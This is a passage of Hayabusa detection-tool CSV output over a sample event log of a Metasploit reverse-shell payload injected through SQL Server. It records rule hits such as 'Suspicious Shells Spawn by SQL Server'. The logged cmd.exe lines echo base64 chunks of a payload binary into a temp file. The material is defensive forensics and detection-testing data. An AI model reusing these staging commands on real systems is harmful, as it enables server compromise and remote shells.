CiVzJXMlcyVzDQoAAEhFQUQAAAAAR0VUAENvbm5lY3Rpb246IEtlZXAtQWxpdmUNCgAAAABBY2NlcHQ6ICovKg0KAAAAVXNlci1BZ2VudDogQXBhY2hlQmVuY2gvAAAAADIuMwBIb3N0OiAAAGFwcl9wb2xsc2V0X2NyZWF0ZSBmYWlsZWQAAAAoYmUgcGF0aWVudCklcwAALi4uAAoAAABbdGhyb3VnaCAlczolZF0gAAAAAEJlbmNobWFya2luZyAlcyAAAAAAJXM6ICVzICglZCkKAAAAAFNlbmQgcmVxdWVzdCBmYWlsZWQhCgAAAFNlbmQgcmVxdWVzdCB0aW1lZCBvdXQhCgAAAAAlcwklSTY0ZAklSTY0ZAklSTY0ZAklSTY0ZAklSTY0ZAoAAABzdGFydHRpbWUJc2Vjb25kcwljdGltZQlkdGltZQl0dGltZQl3YWl0CgAAAENhbm5vdCBvcGVuIGdudXBsb3Qgb3V0cHV0IGZpbGUAJWQsJS4zZgoAAAAAUGVyY2VudGFnZSBzZXJ2ZWQsVGltZSBpbiBtcwoAAABDYW5ub3Qgb3BlbiBDU1Ygb3V0cHV0IGZpbGUAdwAAACAgJWQlJSAgJTVJNjRkCgAgMTAwJSUgICU1STY0ZCAobG9uZ2VzdCByZXF1ZXN0KQoAAAAgMCUlICA8MD4gKG5ldmVyKQoAAApQZXJjZW50YWdlIG9mIHRoZSByZXF1ZXN0cyBzZXJ2ZWQgd2l0aGluIGEgY2VydGFpbiB0aW1lIChtcykKAABUb3RhbDogICAgICAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAABQcm9jZXNzaW5nOiAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAABDb25uZWN0OiAgICAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAAAgICAgICAgICAgICAgIG1pbiAgIGF2ZyAgIG1heAoAAFdBUk5JTkc6IFRoZSBtZWRpYW4gYW5kIG1lYW4gZm9yIHRoZSB0b3RhbCB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAAAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgdG90YWwgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgBXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgd2FpdGluZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRo>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.867 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.867 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.869 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.140 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHdhaXRpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAAAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgcHJvY2Vzc2luZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHByb2Nlc3NpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG5vdCB3aXRoaW4gYSBub3JtYWwgZGV2aWF0aW9uCiAgICAgICAgVGhlc2UgcmVzdWx0cyBhcmUgcHJvYmFibHkgbm90IHRoYXQgcmVsaWFibGUuCgAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG1vcmUgdGhhbiB0d2ljZSB0aGUgc3RhbmRhcmQKICAgICAgIGRldmlhdGlvbiBhcGFydC4gVGhlc2UgcmVzdWx0cyBhcmUgTk9UIHJlbGlhYmxlLgoAAAAAVG90YWw6ICAgICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAV2FpdGluZzogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAUHJvY2Vzc2luZzogJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAQ29ubmVjdDogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAICAgICAgICAgICAgICBtaW4gIG1lYW5bKy8tc2RdIG1lZGlhbiAgIG1heAoAAAAACkNvbm5lY3Rpb24gVGltZXMgKG1zKQoAICAgICAgICAgICAgICAgICAgICAgICAgJS4yZiBrYi9zIHRvdGFsCgAAAAAgICAgICAgICAgICAg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.140 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.140 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.143 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.414 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ICAgICAgICAgICAlLjJmIGtiL3Mgc2VudAoAVHJhbnNmZXIgcmF0ZTogICAgICAgICAgJS4yZiBbS2J5dGVzL3NlY10gcmVjZWl2ZWQKAFRpbWUgcGVyIHJlcXVlc3Q6ICAgICAgICUuM2YgW21zXSAobWVhbiwgYWNyb3NzIGFsbCBjb25jdXJyZW50IHJlcXVlc3RzKQoAAABUaW1lIHBlciByZXF1ZXN0OiAgICAgICAlLjNmIFttc10gKG1lYW4pCgAAAFJlcXVlc3RzIHBlciBzZWNvbmQ6ICAgICUuMmYgWyMvc2VjXSAobWVhbikKAAAAAEhUTUwgdHJhbnNmZXJyZWQ6ICAgICAgICVJNjRkIGJ5dGVzCgAAAABUb3RhbCBQVVQ6ICAgICAgICAgICAgICAlSTY0ZAoAAFRvdGFsIFBPU1RlZDogICAgICAgICAgICVJNjRkCgAAVG90YWwgdHJhbnNmZXJyZWQ6ICAgICAgJUk2NGQgYnl0ZXMKAAAAAEtlZXAtQWxpdmUgcmVxdWVzdHM6ICAgICVkCgBOb24tMnh4IHJlc3BvbnNlczogICAgICAlZAoAV3JpdGUgZXJyb3JzOiAgICAgICAgICAgJWQKACAgIChDb25uZWN0OiAlZCwgUmVjZWl2ZTogJWQsIExlbmd0aDogJWQsIEV4Y2VwdGlvbnM6ICVkKQoAAEZhaWxlZCByZXF1ZXN0czogICAgICAgICVkCgBDb21wbGV0ZSByZXF1ZXN0czogICAgICAlZAoAVGltZSB0YWtlbiBmb3IgdGVzdHM6ICAgJS4zZiBzZWNvbmRzCgAAAENvbmN1cnJlbmN5IExldmVsOiAgICAgICVkCgBEb2N1bWVudCBMZW5ndGg6ICAgICAgICAldSBieXRlcwoAAABEb2N1bWVudCBQYXRoOiAgICAgICAgICAlcwoAU2VydmVyIFBvcnQ6ICAgICAgICAgICAgJWh1CgAAAABTZXJ2ZXIgSG9zdG5hbWU6ICAgICAgICAlcwoAU2VydmVyIFNvZnR3YXJlOiAgICAgICAgJXMKAAoKAAA8L3RhYmxlPgoAAAAAAAAAPHRyICVzPjx0aCAlcz5Ub3RhbDo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggJXM+UHJvY2Vzc2luZzo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggJXM+Q29ubmVjdDo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgA8dHIg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x82c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.414 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.414 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.416 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.687 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo JXM+PHRoICVzPiZuYnNwOzwvdGg+IDx0aCAlcz5taW48L3RoPiAgIDx0aCAlcz5hdmc8L3RoPiAgIDx0aCAlcz5tYXg8L3RoPjwvdHI+CgA8dHIgJXM+PHRoICVzIGNvbHNwYW49ND5Db25ubmVjdGlvbiBUaW1lcyAobXMpPC90aD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49MiAlcz4mbmJzcDs8L3RkPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHRvdGFsPC90ZD48L3RyPgoAADx0ciAlcz48dGQgY29sc3Bhbj0yICVzPiZuYnNwOzwvdGQ+PHRkIGNvbHNwYW49MiAlcz4lLjJmIGtiL3Mgc2VudDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VHJhbnNmZXIgcmF0ZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHJlY2VpdmVkPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+UmVxdWVzdHMgcGVyIHNlY29uZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZjwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkhUTUwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Ub3RhbCBQVVQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkPC90ZD48L3RyPgoAAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRvdGFsIFBPU1RlZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JUk2NGQ8L3RkPjwvdHI+CgAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VG90YWwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPktlZXAtQWxpdmUgcmVxdWVzdHM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVkPC90ZD48L3RyPgoAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+Tm9uLTJ4eCByZXNwb25zZXM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVkPC90ZD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49NCAlcyA+ICAgKENvbm5lY3Q6ICVkLCBMZW5ndGg6ICVkLCBFeGNlcHRpb25zOiAlZCk8L3RkPjwvdHI+CgAAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RmFpbGVkIHJlcXVlc3Rz>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.687 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.687 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.689 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.962 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo OjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Db21wbGV0ZSByZXF1ZXN0czo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JWQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRpbWUgdGFrZW4gZm9yIHRlc3RzOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lLjNmIHNlY29uZHM8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkNvbmN1cnJlbmN5IExldmVsOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RG9jdW1lbnQgTGVuZ3RoOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4ldSBieXRlczwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkRvY3VtZW50IFBhdGg6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+U2VydmVyIFBvcnQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVodTwvdGQ+PC90cj4KAAAAAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5TZXJ2ZXIgSG9zdG5hbWU6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlNlcnZlciBTb2Z0d2FyZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JXM8L3RkPjwvdHI+CgAKCjx0YWJsZSAlcz4KAAAAc29ja2V0IHJlY2VpdmUgYnVmZmVyAAAAc29ja2V0IHNlbmQgYnVmZmVyAABzb2NrZXQgbm9uYmxvY2sAc29ja2V0AABDb21wbGV0ZWQgJWQgcmVxdWVzdHMKAABDb250ZW50LWxlbmd0aDoAQ29udGVudC1MZW5ndGg6AGtlZXAtYWxpdmUAAEtlZXAtQWxpdmUAAExPRzogUmVzcG9uc2UgY29kZSA9ICVzCgAAAABXQVJOSU5HOiBSZXNwb25zZSBjb2RlIG5vdCAyeHggKCVzKQoAAAAANTAwAEhUVFAAAAAAU2VydmVyOgANCg0KAAAAAExPRzogaGVhZGVyIHJlY2VpdmVkOgolcwoAAABhcHJfc29ja2V0X3JlY3YAPC9wPgo8cD4KAAAAIExpY2Vuc2VkIHRvIFRoZSBBcGFjaGUgU29mdHdhcmUgRm91bmRhdGlvbiwgaHR0cDovL3d3dy5hcGFjaGUub3JnLzxicj4KAAAAAAAAAAAgQ29weXJpZ2h0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x840 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.962 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.962 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.964 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.236 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo IDE5OTYgQWRhbSBUd2lzcywgWmV1cyBUZWNobm9sb2d5IEx0ZCwgaHR0cDovL3d3dy56ZXVzdGVjaC5uZXQvPGJyPgoAACBUaGlzIGlzIEFwYWNoZUJlbmNoLCBWZXJzaW9uICVzIDxpPiZsdDslcyZndDs8L2k+PGJyPgoAJFJldmlzaW9uOiA2NTU2NTQgJAA8cD4KAAAAAAAAAABMaWNlbnNlZCB0byBUaGUgQXBhY2hlIFNvZnR3YXJlIEZvdW5kYXRpb24sIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy8KAAAAAABDb3B5cmlnaHQgMTk5NiBBZGFtIFR3aXNzLCBaZXVzIFRlY2hub2xvZ3kgTHRkLCBodHRwOi8vd3d3LnpldXN0ZWNoLm5ldC8KAAAAVGhpcyBpcyBBcGFjaGVCZW5jaCwgVmVyc2lvbiAlcwoAAAAAMi4zIDwkUmV2aXNpb246IDY1NTY1NCAkPgAAACAgICAtaCAgICAgICAgICAgICAgRGlzcGxheSB1c2FnZSBpbmZvcm1hdGlvbiAodGhpcyBtZXNzYWdlKQoAAAAgICAgLXIgICAgICAgICAgICAgIERvbid0IGV4aXQgb24gc29ja2V0IHJlY2VpdmUgZXJyb3JzLgoAAAAgICAgLWUgZmlsZW5hbWUgICAgIE91dHB1dCBDU1YgZmlsZSB3aXRoIHBlcmNlbnRhZ2VzIHNlcnZlZAoAAAAAICAgIC1nIGZpbGVuYW1lICAgICBPdXRwdXQgY29sbGVjdGVkIGRhdGEgdG8gZ251cGxvdCBmb3JtYXQgZmlsZS4KAAAAAAAAICAgIC1TICAgICAgICAgICAgICBEbyBub3Qgc2hvdyBjb25maWRlbmNlIGVzdGltYXRvcnMgYW5kIHdhcm5pbmdzLgoAAAAAICAgIC1kICAgICAgICAgICAgICBEbyBub3Qgc2hvdyBwZXJjZW50aWxlcyBzZXJ2ZWQgdGFibGUuCgAAICAgIC1rICAgICAgICAgICAgICBVc2UgSFRUUCBLZWVwQWxpdmUgZmVhdHVyZQoAICAgIC1WICAgICAgICAgICAgICBQcmludCB2ZXJzaW9uIG51bWJlciBhbmQgZXhpdAoAACAgICAtWCBwcm94eTpwb3J0ICAgUHJveHlzZXJ2ZXIgYW5kIHBvcnQgbnVtYmVyIHRvIHVzZQoAICAgIC1QIGF0dHJpYnV0ZSAgICBBZGQgQmFzaWMgUHJveHkgQXV0aGVudGljYXRpb24sIHRoZSBhdHRyaWJ1dGVzCgAAAAAAICAgICAgICAgICAgICAgICAgICBhcmUgYSBjb2xvbiBzZXBhcmF0ZWQgdXNlcm5hbWUgYW5kIHBhc3N3b3JkLgoAAAAAAAAAICAgIC1BIGF0dHJpYnV0ZSAgICBBZGQgQmFzaWMgV1dXIEF1dGhlbnRpY2F0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe14 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.236 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.236 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.238 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.510 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aW9uLCB0aGUgYXR0cmlidXRlcwoAAAAAAAAAICAgICAgICAgICAgICAgICAgICBJbnNlcnRlZCBhZnRlciBhbGwgbm9ybWFsIGhlYWRlciBsaW5lcy4gKHJlcGVhdGFibGUpCgAAAAAAAAAgICAgLUggYXR0cmlidXRlICAgIEFkZCBBcmJpdHJhcnkgaGVhZGVyIGxpbmUsIGVnLiAnQWNjZXB0LUVuY29kaW5nOiBnemlwJwoAAAAAACAgICAtQyBhdHRyaWJ1dGUgICAgQWRkIGNvb2tpZSwgZWcuICdBcGFjaGU9MTIzNC4gKHJlcGVhdGFibGUpCgAgICAgLXogYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGQgb3IgdGggYXR0cmlidXRlcwoAAAAAICAgIC15IGF0dHJpYnV0ZXMgICBTdHJpbmcgdG8gaW5zZXJ0IGFzIHRyIGF0dHJpYnV0ZXMKAAAgICAgLXggYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGFibGUgYXR0cmlidXRlcwoAAAAgICAgLWkgICAgICAgICAgICAgIFVzZSBIRUFEIGluc3RlYWQgb2YgR0VUCgAAAAAgICAgLXcgICAgICAgICAgICAgIFByaW50IG91dCByZXN1bHRzIGluIEhUTUwgdGFibGVzCgAAACAgICAtdiB2ZXJib3NpdHkgICAgSG93IG11Y2ggdHJvdWJsZXNob290aW5nIGluZm8gdG8gcHJpbnQKACAgICAgICAgICAgICAgICAgICAgRGVmYXVsdCBpcyAndGV4dC9wbGFpbicKAAAAACAgICAgICAgICAgICAgICAgICAgJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcKAAAAACAgICAtVCBjb250ZW50LXR5cGUgQ29udGVudC10eXBlIGhlYWRlciBmb3IgUE9TVGluZywgZWcuCgAAACAgICAtdSBwdXRmaWxlICAgICAgRmlsZSBjb250YWluaW5nIGRhdGEgdG8gUFVULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAAAAAAAAAICAgIC1wIHBvc3RmaWxlICAgICBGaWxlIGNvbnRhaW5pbmcgZGF0YSB0byBQT1NULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAACAgICAtYiB3aW5kb3dzaXplICAgU2l6ZSBvZiBUQ1Agc2VuZC9yZWNlaXZlIGJ1ZmZlciwgaW4gYnl0ZXMKAAAgICAgLXQgdGltZWxpbWl0ICAgIFNlY29uZHMgdG8gbWF4LiB3YWl0IGZvciByZXNwb25zZXMKACAgICAtYyBjb25jdXJyZW5jeSAgTnVtYmVyIG9mIG11bHRpcGxlIHJlcXVlc3RzIHRvIG1ha2UKAAAAACAgICAtbiBy>>%TEMP%\feyQV.b64 | Path: 